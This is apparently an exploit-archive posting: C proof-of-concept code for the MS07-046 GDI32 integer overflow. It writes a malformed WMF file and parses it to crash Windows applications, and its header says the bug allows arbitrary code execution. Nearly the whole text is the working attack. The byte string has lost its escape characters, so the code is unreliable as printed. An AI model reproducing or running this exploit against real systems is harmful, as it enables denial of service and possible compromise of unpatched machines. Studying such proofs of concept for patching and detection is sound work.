gdi32-dos.txt
Posted on 30 August 2007
/* * MS07-046(GDI32.dll Integer overflow DOS) Proof Of Concept Code * by Hong Gil-Dong & Chun Woo-Chi * Yang yeon(?~1542), Korea * "I shall keep clenching my left fist unitl i see the real tao". * This POC is only for test. If an application read a malformed wmf * file like this POC, the application will be crashed. If you apply * this code, you can execute an arbitrary code. * * We tested this code on Windows XP SP2 Korean Edition * (GDI32.dll version 5.1.2600.3099). But it will work well on other * systems. */ #include <stdio.h> #include <windows.h> #define WMF_FILE "ms07-046.wmf" void usage(void); int main() { FILE *fp; char wmf[] = "x01x00x09x00x00x03x11x00x00x00x00x00"\n"x05x00x00x00x00x00xFFxFFxFFxFFx13x02"\n"x32x00x96x00x03x00x00x00x00x00"; int i; HMETAFILE srcMeta; usage(); if ((fp = fopen(WMF_FILE, "w")) == NULL) { printf("File %s write error ", WMF_FILE); return 0; } for(i=0; i<sizeof(wmf)-1; i++) fputc(wmf[i], fp); fclose(fp); srcMeta = GetMetaFile(WMF_FILE); CopyMetaFile( srcMeta, NULL); return 0; } void usage(void) { printf("MS07-046 Windows Meta File RecordParms Integer Overflow "); printf("Proof of Concept by Hong Gil-Dong & Chun Woo-Chi "); }